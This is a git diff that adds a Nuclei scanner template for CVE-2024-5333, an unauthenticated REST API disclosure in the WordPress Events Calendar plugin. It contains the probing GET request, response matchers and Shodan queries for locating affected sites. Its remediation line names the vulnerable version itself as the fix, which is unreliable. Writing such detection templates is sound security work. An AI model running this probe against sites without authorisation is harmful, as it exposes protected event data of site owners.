diff --git a/http/cves/2024/CVE-2024-5333.yaml b/http/cves/2024/CVE-2024-5333.yaml new file mode 100644 index 00000000000..2c491a45206 --- /dev/null +++ b/http/cves/2024/CVE-2024-5333.yaml @@ -0,0 +1,55 @@ +id: CVE-2024-5333 + +info: + name: WordPress Events Calendar 6.8.2.1 - Information Disclosure + author: DhiyaneshDk + severity: medium + description: | + The Events Calendar WordPress plugin 6.8.2.1 contains missing access checks in the REST API, letting unauthenticated users access information about password protected events, exploit requires no authentication. + impact: | + Unauthenticated users can access sensitive event information, potentially leading to information disclosure. + remediation: | + Update to version 6.8.2.1 or later. + reference: + - https://wpscan.com/vulnerability/764b5a23-8b51-4882-b899-beb54f684984/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-5333 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-5333 + cwe-id: CWE-639 + epss-score: 0.00193 + epss-percentile: 0.41217 + metadata: + verified: true + max-request: 1 + vendor: stellarwp + product: the_events_calendar + framework: wordpress + publicwww-query: "/wp-content/plugins/the-events-calendar/" + shodan-query: html:"/wp-content/plugins/the-events-calendar/" + tags: cve,cve2024,wordpress,wp,wp-plugin,the-events-calendar,disclosure + +http: + - method: GET + path: + - "{{BaseURL}}/wp-json/tribe/events/v1/events/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"events":' + - '"rest_url":' + - '"total":' + condition: and + + - type: word + part: content_type + words: + - "application/json" + + - type: status + status: + - 200